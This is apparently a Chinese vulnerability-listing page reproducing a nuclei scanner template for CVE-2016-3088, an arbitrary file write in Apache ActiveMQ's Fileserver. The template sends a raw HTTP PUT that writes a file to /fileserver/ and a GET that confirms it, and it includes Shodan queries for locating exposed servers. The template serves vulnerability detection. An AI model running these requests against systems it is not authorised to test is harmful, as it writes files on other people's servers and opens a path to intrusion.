CVE-2016-3088: Apache ActiveMQ Fileserver - Arbitrary File Write

日期: 2025-08-01 | 影响软件: Apache ActiveMQ Fileserver | POC: 已公开

漏洞描述

Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.

PoC代码[已公开]

id: CVE-2016-3088

info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  impact: |
    An attacker can write arbitrary files on the server, potentially leading to remote code execution.
  remediation: |
    Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
    - http://rhn.redhat.com/errata/RHSA-2016-2036.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
    epss-score: 0.9429
    epss-percentile: 0.99933
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: activemq
    shodan-query:
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive
variables:
  rand1: '{{rand_int(11111111, 99999999)}}'

http:
  - raw:
      - |
        PUT /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

        {{rand1}}
      - |
        GET /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==204"
          - "status_code_2==200"
          - "contains((body_2), '{{rand1}}')"
        condition: and
# digest: 4a0a00473045022100d79c4d5f1abd41cb026f80c7096e440586e41384f8c7d04244584011a3727e9602201066bc695b7951a0e92b5d0b4e04a2cbac24f9025649b05d3dc05b3c1a7370a7:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2016/CVE-2016-3088.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2016-3081: Apache S2-032 Struts RCE POC

CVE-2016-3088: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) POC

CVE-2016-5674: NUUO NVR 摄像机 debugging_center_utils_.php 命令执行漏洞 POC

CVE-2016-0957: Adobe AEM Dispatcher <4.15 - Rules Bypass POC

CVE-2016-1000126: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting POC